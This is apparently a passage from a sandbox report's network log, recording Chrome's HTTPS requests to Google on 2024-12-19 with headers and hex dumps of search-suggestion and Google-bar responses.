                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 4a 36 4f 72 30 44 73 73 59 57 4e 75 46 74 5a 67 69 52 53 48 59 49 41 36 70 7a 30 6e 64 71 63 43 61 44 56 49 50 6c 70 49 49 35 56 36 70 79 75 49 48 33 67 64 48 39 49 57 31 30 44 55 43 4f 5a 77 69 44 2b 2b 62 41 39 57 38 79 70 6b 58 47 30 62 59 6d 68 4f 33 42 2b 54 67 34 42 76 44 46 55 33 5a 6a 72 57 57 4b 30 6b 71 30 43 49 47 70 4d 78 50 6e 4f 43 4f 6b 78 31 53 47 5a 61 37 47 37 59 52 36 75 58 35 43 74 64 52 56 5a 75 52 2b 70 63 6d 44 48 69 63 4a 67 69 6b 78 30 50 51 72 73 71 5a 42 51 42 4f 30 5a 49 5a 72 68 54 6a 37 50 55 58 78 42 70 46 30 35 71 32 6e 6a 68 4a 4d 73 35 6c 54 65 2f 45 57 35 7a 32 6a 71 49 43 41 6c 48 56 31 79 47 7a 42 66 2f 67 2f 78 43 4d 44 67 54 4d 79 4c 32 63 61 68 52 67 32 69 6f 4b 72 4d 78 43 31 61 4c 44 6b 51 77 58 51 4e 43 52 47 71
                                                                                                                                                                                                                                                          Data Ascii: J6Or0DssYWNuFtZgiRSHYIA6pz0ndqcCaDVIPlpII5V6pyuIH3gdH9IW10DUCOZwiD++bA9W8ypkXG0bYmhO3B+Tg4BvDFU3ZjrWWK0kq0CIGpMxPnOCOkx1SGZa7G7YR6uX5CtdRVZuR+pcmDHicJgikx0PQrsqZBQBO0ZIZrhTj7PUXxBpF05q2njhJMs5lTe/EW5z2jqICAlHV1yGzBf/g/xCMDgTMyL2cahRg2ioKrMxC1aLDkQwXQNCRGq
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 73 67 4f 43 43 41 72 53 68 50 72 49 61 6b 38 6e 33 79 51 4a 70 73 39 4d 32 36 72 63 6e 67 49 41 51 4e 65 65 48 61 6b 47 35 4f 62 34 48 63 55 63 52 74 69 50 76 5a 38 76 44 47 36 63 49 68 76 76 6d 77 50 39 6f 38 57 59 58 6b 67 42 79 64 73 4a 35 51 48 6c 71 36 70 63 7a 42 74 50 33 34 57 35 6e 79 6c 65 49 64 6f 33 41 36 4c 4a 55 64 61 6c 79 35 6b 49 48 30 4c 51 6b 78 75 70 46 4f 44 72 38 52 65 4d 58 77 72 53 6b 50 72 49 61 6d 38 33 79 69 38 45 6f 39 56 49 33 61 33 59 6d 52 56 53 44 35 61 45 46 37 52 47 73 66 33 69 43 38 73 4f 42 4d 7a 49 76 5a 78 71 46 47 44 61 4c 41 57 6f 78 55 33 4f 71 38 69 62 43 68 74 49 30 70 30 54 70 51 4c 74 37 50 63 66 77 42 70 4e 31 6f 65 2b 6d 53 52 46 4c 35 78 72 51 36 6a 62 41 34 54 75 37 34 38 47 48 6b 79 57 69 6c 36 38 52 75 37
                                                                                                                                                                                                                                                          Data Ascii: sgOCCArShPrIak8n3yQJps9M26rcngIAQNeeHakG5Ob4HcUcRtiPvZ8vDG6cIhvvmwP9o8WYXkgBydsJ5QHlq6pczBtP34W5nyleIdo3A6LJUdaly5kIH0LQkxupFODr8ReMXwrSkPrIam83yi8Eo9VI3a3YmRVSD5aEF7RGsf3iC8sOBMzIvZxqFGDaLAWoxU3Oq8ibChtI0p0TpQLt7PcfwBpN1oe+mSRFL5xrQ6jbA4Tu748GHkyWil68Ru7
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 46 45 53 6c 61 69 78 68 69 39 4c 4e 70 34 51 41 4b 48 4e 52 4d 72 75 30 61 74 4c 55 6b 37 4d 31 55 69 63 48 36 6e 73 2f 6c 79 55 55 56 2f 53 69 4c 32 4b 50 45 73 73 7a 53 34 4f 6f 2b 46 4d 32 37 6a 4e 6d 77 59 44 53 4a 71 65 48 65 56 49 71 65 7a 71 58 4a 52 52 5a 64 4b 65 75 62 38 70 58 53 6d 63 61 30 4f 6f 31 51 4f 45 37 76 44 55 46 78 46 52 31 5a 6f 42 6d 30 61 78 38 73 78 63 78 77 64 4e 78 59 75 73 6d 79 64 41 4d 65 4a 6c 57 2f 75 52 45 59 37 38 6e 49 74 46 44 58 36 59 31 52 48 6c 58 74 44 79 73 67 71 4d 53 52 69 62 79 4b 6a 51 63 67 78 6e 33 7a 63 52 71 63 42 56 33 2b 6e 77 71 69 49 45 53 39 47 46 46 37 49 4a 71 61 57 79 45 34 78 4a 63 35 57 42 76 59 73 37 57 69 33 4d 49 6b 4f 51 6a 51 50 45 37 70 62 55 4d 42 46 50 32 4a 49 47 74 45 76 4f 2f 66 67 62
                                                                                                                                                                                                                                                          Data Ascii: FESlaixhi9LNp4QAKHNRMru0atLUk7M1UicH6ns/lyUUV/SiL2KPEsszS4Oo+FM27jNmwYDSJqeHeVIqezqXJRRZdKeub8pXSmca0Oo1QOE7vDUFxFR1ZoBm0ax8sxcxwdNxYusmydAMeJlW/uREY78nItFDX6Y1RHlXtDysgqMSRibyKjQcgxn3zcRqcBV3+nwqiIES9GFF7IJqaWyE4xJc5WBvYs7Wi3MIkOQjQPE7pbUMBFP2JIGtEvO/fgb
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 53 46 74 64 77 6b 52 79 44 62 4e 52 57 30 6a 30 76 66 74 4e 53 71 4f 7a 6c 4e 30 4a 49 4b 6f 67 44 50 79 37 4a 53 6a 42 34 4b 6a 62 48 36 32 47 70 7a 62 70 77 39 51 2f 65 44 64 74 2b 67 77 4a 4d 54 41 77 7a 2b 74 69 71 66 52 4d 58 73 35 31 37 34 46 6c 72 45 67 37 65 63 61 67 4a 67 32 6d 56 62 2f 34 30 44 32 4c 2b 4f 7a 46 56 41 47 6f 50 47 52 2f 56 55 39 71 58 72 58 4e 70 52 45 6f 66 47 2b 6f 4a 71 46 47 43 62 4a 68 47 39 78 55 44 4b 72 59 6d 71 4f 7a 56 50 30 5a 51 47 74 52 48 6d 31 63 77 4a 7a 78 39 45 30 70 36 72 30 47 51 4d 4c 35 78 39 4f 75 2b 4c 41 2b 50 67 6a 6f 78 46 53 67 48 6a 6c 68 36 72 41 66 2f 36 76 7a 76 43 46 6b 76 44 6d 4b 32 66 61 67 4a 67 32 6d 56 62 2f 59 30 44 32 4c 2b 4f 7a 46 56 41 47 6f 50 47 52 2f 56 55 39 71 58 72 58 4e 70 52 45
                                                                                                                                                                                                                                                          Data Ascii: SFtdwkRyDbNRW0j0vftNSqOzlN0JIKogDPy7JSjB4KjbH62Gpzbpw9Q/eDdt+gwJMTAwz+tiqfRMXs5174FlrEg7ecagJg2mVb/40D2L+OzFVAGoPGR/VU9qXrXNpREofG+oJqFGCbJhG9xUDKrYmqOzVP0ZQGtRHm1cwJzx9E0p6r0GQML5x9Ou+LA+PgjoxFSgHjlh6rAf/6vzvCFkvDmK2fagJg2mVb/Y0D2L+OzFVAGoPGR/VU9qXrXNpRE
                                                                                                                                                                                                                                                          2024-12-19 13:20:34 UTC1369INData Raw: 66 4c 51 34 41 32 7a 4d 41 37 34 30 44 30 4f 36 57 31 41 51 59 55 64 75 61 46 2b 6b 42 38 2b 79 79 55 6f 77 66 43 6f 33 49 75 35 6f 36 51 53 2f 62 61 51 57 68 7a 51 50 44 34 4e 66 55 45 31 49 5a 68 64 74 51 74 30 61 78 71 37 55 66 33 67 4e 4d 31 70 36 35 31 78 52 79 44 63 34 69 45 36 79 42 63 74 47 71 32 49 45 47 41 6b 62 6f 71 7a 32 33 41 66 6e 6f 73 43 33 61 45 6b 72 62 6a 2f 72 65 61 6c 52 67 68 47 55 75 76 63 52 54 33 2b 36 41 31 41 6c 53 47 5a 61 59 41 71 49 57 36 71 66 31 42 73 74 52 56 5a 75 52 2b 6f 5a 71 46 48 4f 53 5a 52 48 76 6d 77 4f 62 6f 4d 4f 56 42 68 78 43 78 49 63 57 70 68 44 71 72 4d 77 69 34 51 4e 4e 78 59 76 34 6f 53 64 49 4e 73 6b 6d 45 36 6a 39 66 66 47 38 79 59 51 47 55 47 33 52 6d 42 79 62 4f 4e 37 36 39 51 79 4f 4e 30 6e 44 69 2f
                                                                                                                                                                                                                                                          Data Ascii: fLQ4A2zMA740D0O6W1AQYUduaF+kB8+yyUowfCo3Iu5o6QS/baQWhzQPD4NfUE1IZhdtQt0axq7Uf3gNM1p651xRyDc4iE6yBctGq2IEGAkboqz23AfnosC3aEkrbj/realRghGUuvcRT3+6A1AlSGZaYAqIW6qf1BstRVZuR+oZqFHOSZRHvmwOboMOVBhxCxIcWphDqrMwi4QNNxYv4oSdINskmE6j9ffG8yYQGUG3RmBybON769QyON0nDi/


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.449751172.217.19.2284437488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:36 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:37 GMT
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-HnmY0gfDgRUX004MLpQLDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC124INData Raw: 33 34 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 77 65 73 74 65 72 6e 20 77 61 73 68 69 6e 67 74 6f 6e 20 70 6f 77 65 72 20 6f 75 74 61 67 65 73 22 2c 22 6b 66 63 20 73 61 75 63 79 20 72 65 73 74 61 75 72 61 6e 74 22 2c 22 72 61 76 69 63 68 61 6e 64 72 61 6e 20 61 73 68 77 69 6e 20 63 72 69 63 6b 65 74 20 72 65 74 69 72 65 6d 65 6e 74 22 2c 22 68 31 62 20 76 69 73 61 20
                                                                                                                                                                                                                                                          Data Ascii: 34f)]}'["",["western washington power outages","kfc saucy restaurant","ravichandran ashwin cricket retirement","h1b visa
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC730INData Raw: 6f 76 65 72 68 61 75 6c 22 2c 22 6c 61 20 70 61 6c 6d 61 20 6e 65 74 66 6c 69 78 22 2c 22 73 70 61 72 6b 20 6f 72 20 6c 65 61 64 65 72 20 73 69 65 72 72 61 20 70 6f 6b c3 a9 6d 6f 6e 20 67 6f 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 6a 61 63 6b 70 6f 74 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 2c 22 72 61 6e 67 65 72 73 20 74 72 61 64 65 20 6b 61 61 70 6f 20 6b 61 6b 6b 6f 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63
                                                                                                                                                                                                                                                          Data Ascii: overhaul","la palma netflix","spark or leader sierra pokmon go","mega millions jackpot lottery numbers","rangers trade kaapo kakko"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmc
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.449750172.217.19.2284437488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:36 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.449752172.217.19.2284437488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:36 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:37 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC372INData Raw: 32 38 33 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                          Data Ascii: 283a)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 37 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                          Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700297,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
